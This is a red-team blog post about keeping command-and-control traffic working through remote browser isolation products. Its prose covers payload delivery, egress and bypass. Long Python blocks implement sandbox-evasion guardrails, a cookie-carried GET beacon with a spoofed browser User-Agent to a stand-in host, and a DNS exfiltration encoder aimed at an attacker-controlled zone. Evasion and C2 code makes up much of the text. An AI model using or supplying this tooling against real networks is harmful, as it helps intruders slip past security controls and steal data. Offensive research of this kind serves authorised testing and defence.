Following a brief introduction to the technology, we share our firsthand experiences with RBI solutions and the techniques the SpecterOps team has employed to establish command and control to systems that proxy their traffic through RBI products, broken down into three segments: Payload Ingress, C2 Egress, and RBI Bypass.
There are three types of browser isolation in use today: client-side browser isolation, on-premises browser isolation, and RBI. As the names imply, client-side isolation virtualizes the browsing on the local host, on-premises isolation runs the browser within the organization's own infrastructure, and RBI virtualizes the web session in the cloud.
One of the primary concerns you should have as an offensive professional is the profound impact RBI will likely have on your C2 traffic.
An RBI product may offer a link that lets a user open a page in isolation manually, but an organization usually configures its proxy to send ALL web traffic through RBI. This means your stealthy HTTPS C2 traffic passes through the same virtualized browser process as everything else, and the server responses come back to your agents as an inert rendered stream rather than the raw response.
As you can probably imagine, trying to figure out why your C2 traffic is not returning when an organization uses RBI can be very frustrating.
When delivering payloads to targets through RBI solutions, the sandboxing and scanning capabilities of those solutions present significant hurdles that must be overcome before you achieve code execution in the target environment.
Standard sandbox-evasion techniques will help a payload survive the RBI scanning process: prime factorization as a CPU-bound stall, thread sleep checks, environment checks and guardrails such as enumerating the processors in the system, string obfuscation and string building, conditional loops that never terminate inside an emulator, and logic that only proceeds on user input.
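As an added example (not the post's own tooling or any particular framework's code), the Python below implements several of the guardrails named above: a processor-count check, a sleep-acceleration check, a prime-factorization stall, and string building from XOR-encoded bytes. The thresholds, the stall value, and the `should_execute` wrapper are assumptions chosen for illustration; a real payload would tune them to the target and run them before any staging logic.

```python
import os
import time

# Assumed thresholds for this example; tune them to the target environment.
MIN_CPUS = 2           # many detonation sandboxes expose a single vCPU
STALL_SECONDS = 5      # how long the sleep check waits
SLEEP_TOLERANCE = 0.5  # elapsed < 50% of requested => the sleep was skipped
STALL_N = 9998000099   # 99989 * 99991; scale up so factoring takes tens of seconds


def trial_division(n):
    """Return the prime factors of n (ascending) by trial division.

    Factoring a semiprime is a CPU-bound stall: a sandbox can patch Sleep()
    to return immediately, but it cannot shortcut the arithmetic, so a
    time-boxed scanner may give up before the payload does anything.
    """
    factors = []
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1 if d == 2 else 2
    if n > 1:
        factors.append(n)
    return factors


def sleep_was_accelerated(seconds=STALL_SECONDS, sleep=time.sleep,
                          clock=time.monotonic, tolerance=SLEEP_TOLERANCE):
    """Sleep, then compare wall-clock time elapsed with the time requested.

    Sandboxes commonly hook sleep calls to fast-forward delays; if far less
    time passed than requested, the delay was skipped.
    """
    start = clock()
    sleep(seconds)
    elapsed = clock() - start
    return elapsed < seconds * tolerance


def enough_cpus(minimum=MIN_CPUS, cpu_count=None):
    """Environment check: refuse to run on hosts with too few processors."""
    count = cpu_count if cpu_count is not None else (os.cpu_count() or 1)
    return count >= minimum


def obfuscate(text, key):
    """XOR-encode a string so the plaintext never appears in the file."""
    return bytes(b ^ key for b in text.encode())


def deobfuscate(encoded, key):
    """String building: rebuild the plaintext only at runtime."""
    return bytes(b ^ key for b in encoded).decode()


def should_execute(cpu_count=None, sleep=time.sleep, clock=time.monotonic,
                   stall_seconds=STALL_SECONDS, stall_n=STALL_N):
    """Run the guardrails cheapest-first; return (ok, reasons_for_refusal)."""
    reasons = []
    if not enough_cpus(cpu_count=cpu_count):
        reasons.append("too few CPUs")
    if sleep_was_accelerated(stall_seconds, sleep=sleep, clock=clock):
        reasons.append("sleep accelerated")
    trial_division(stall_n)  # burn CPU regardless, to outlast a scan timeout
    return (not reasons), reasons


if __name__ == "__main__":
    ok, why = should_execute()
    target = deobfuscate(obfuscate("https://cdn.example.com/beacon", 0x5A), 0x5A)
    print("guardrails passed" if ok else f"refusing to run: {why}", target)
```

Passing the sleep and clock functions in as parameters is what makes the check testable without a five-second delay; the real payload simply uses the defaults.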
Some RBI products only allow a user to view the file contents in the browser, or let the user download a sanitized version from which the product has stripped macros, JavaScript, or any other content the vendor deems suspicious, leaving the user with an inert download. Others are configured fail-closed and block the download of any file they cannot scan.
We then check the Cloudflare logs and confirm that RBI is isolating our C2 traffic.
As in the ingress section, some of these talking points may not be new, but we cover them to better explain how RBI products affect C2 traffic when deployed in a target environment.
Based on our experience with RBI, our first recommendation when crafting C2 traffic intended to egress an RBI solution with HTTP traffic is to omit any POST requests.
The request headers you send can change how the RBI solution responds to your C2 traffic and may let you get out without much trouble.
Not all RBI solutions enforce this, but many block web traffic whose User-Agent does not match an approved web browser or does not meet a minimum browser version.
Passing the C2 traffic in a cookie is not a new way of doing business, but it can be a great technique for getting through RBI. Some RBI solutions virtualize and stream the web page content yet transparently pass the Cookie header to the other end of the channel for usability, since many sites require cookie functionality.
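To make the GET-only, cookie-carried beacon concrete, the following Python is an added example rather than code from the post or from any particular C2 framework. It builds a GET request with no body whose payload rides in cookie values under a session-cookie-like name, applies the kind of User-Agent allow-list an RBI proxy might enforce, and reassembles the payload on the server side. The cookie name, the 3800-byte chunk size, the browser allow-list pattern and the minimum version are assumptions.

```python
import base64
import re

# Assumptions for this example: the cookie name mimics a site session cookie,
# and the RBI policy accepts only reasonably current Chrome or Edge agents.
COOKIE_NAME = "SSID"
MAX_COOKIE_VALUE = 3800  # stay under the common 4 KB per-cookie limit
USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
ALLOWED_UA = re.compile(r"(Chrome|Edg)/(\d+)\.")
MIN_BROWSER_VERSION = 110


def encode_chunks(data):
    """base64url without '=' padding is safe inside a cookie value;
    split it so each individual cookie stays under the size limit."""
    enc = base64.urlsafe_b64encode(data).rstrip(b"=").decode()
    return [enc[i:i + MAX_COOKIE_VALUE] for i in range(0, len(enc), MAX_COOKIE_VALUE)]


def decode_chunks(chunks):
    """Reverse of encode_chunks: re-join, restore padding, decode."""
    enc = "".join(chunks)
    return base64.urlsafe_b64decode(enc + "=" * (-len(enc) % 4))


def build_request(host, path, agent_id, data):
    """Agent side: return (request_line, headers) for a GET beacon.

    There is no POST body; the agent identifier and the task output travel
    in the Cookie header, which some RBI products forward unmodified.
    """
    cookies = [f"{COOKIE_NAME}={agent_id}"]
    cookies += [f"{COOKIE_NAME}{i}={c}" for i, c in enumerate(encode_chunks(data))]
    headers = {
        "Host": host,
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Cookie": "; ".join(cookies),
    }
    return f"GET {path} HTTP/1.1", headers


def ua_is_acceptable(user_agent):
    """The check an RBI proxy might apply: approved browser family and minimum version."""
    m = ALLOWED_UA.search(user_agent or "")
    return bool(m) and int(m.group(2)) >= MIN_BROWSER_VERSION


def parse_request(headers):
    """Server side: drop requests a proxy would have dropped, then reassemble
    the cookie chunks in order. Returns (agent_id, data) or None."""
    if not ua_is_acceptable(headers.get("User-Agent")):
        return None
    jar = {}
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    if COOKIE_NAME not in jar:
        return None
    chunks = []
    i = 0
    while f"{COOKIE_NAME}{i}" in jar:
        chunks.append(jar[f"{COOKIE_NAME}{i}"])
        i += 1
    return jar[COOKIE_NAME], decode_chunks(chunks)


if __name__ == "__main__":
    line, hdrs = build_request("cdn.example.com", "/assets/app.js", "a1b2c3", b"whoami\r\n")
    print(line)
    for k, v in hdrs.items():
        print(f"{k}: {v}")
    print(parse_request(hdrs))
```

Chunking across several cookies matters because a single oversized cookie is exactly the kind of anomaly a proxy is likely to reject; the server stitches them back together by index, so ordering is never left to the transport.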
As with any C2 channel, your redirector setup will significantly impact how RBI solutions react to your traffic.
Ensure you have valid TLS certificates, as RBI products often block unencrypted HTTP traffic.
Bypassing RBI outright can be accomplished in a couple of different ways, depending on the capabilities and configuration of the RBI implementation: DNS C2 or third-party C2.
DNS C2. Many RBI solutions only monitor HTTP/HTTPS traffic by default and either require DNS monitoring to be configured explicitly or lack that capability altogether.
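As an added example (not the post's code), the Python below shows the encoding side of a DNS channel of the kind described above: it packs data into base32 labels that respect the 63-byte label and 253-byte name limits, tags each query with a sequence number so the server can reassemble queries that arrive out of order, and decodes them. The zone name, the header label layout and the session identifier are assumptions; issuing the actual lookups through the host resolver is left out so the block runs offline.

```python
import base64

MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a full domain name
C2_DOMAIN = "cdn-metrics.example.com"  # assumed attacker-controlled zone


def _b32(data):
    """base32 (case-insensitive, DNS-safe) without padding, lowercased."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text):
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(session, data):
    """Agent side: split data into names of the form
    <seq:4 hex><session>.<b32 label>...<b32 label>.C2_DOMAIN
    so that every label and every full name stays within DNS limits."""
    enc = _b32(data)
    header_len = 4 + len(session)
    budget = MAX_NAME - len(C2_DOMAIN) - 1 - (header_len + 1)
    labels_per_query = budget // (MAX_LABEL + 1)
    chars_per_query = labels_per_query * MAX_LABEL
    names = []
    for seq, start in enumerate(range(0, len(enc), chars_per_query)):
        chunk = enc[start:start + chars_per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join([f"{seq:04x}{session}"] + labels + [C2_DOMAIN]))
    return names


def decode_queries(names):
    """Server side: ignore names outside our zone, accept queries in any
    order, and reassemble by sequence number. Returns (session, data)."""
    pieces = {}
    session = None
    for name in names:
        if not name.endswith("." + C2_DOMAIN):
            continue  # unrelated lookup hitting the same resolver
        labels = name[:-(len(C2_DOMAIN) + 1)].split(".")
        seq = int(labels[0][:4], 16)
        session = labels[0][4:]
        pieces[seq] = "".join(labels[1:])
    enc = "".join(pieces[k] for k in sorted(pieces))
    return session, _unb32(enc)


if __name__ == "__main__":
    # Constructed sample output; a real agent would send its task results.
    sample = b"whoami\r\nnt authority\\system\r\n"
    for name in encode_queries("ab12", sample):
        print(len(name), name)
    print(decode_queries(encode_queries("ab12", sample)))
```

In a real channel each name would be resolved through the host's configured resolver (for example as a TXT or A query), which is precisely the path an HTTP-only RBI deployment never sees; the sequence header is what lets the server tolerate resolver caching and reordering.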
Third-Party C2. When establishing a new HTTP/S communication channel through an RBI solution, any new domain or IP address you connect to will be subject to inspection as new traffic.
Lastly, try to move to a GET-POST HTTP C2 channel if the RBI solution lets POST requests through.
Calling Home, Get Your Callbacks Through RBI was originally published in Posts By SpecterOps Team Members on Medium.
Republished on securityboulevard.com. Publication date: Thu, 18 Jan 2024 00:13:09 +0000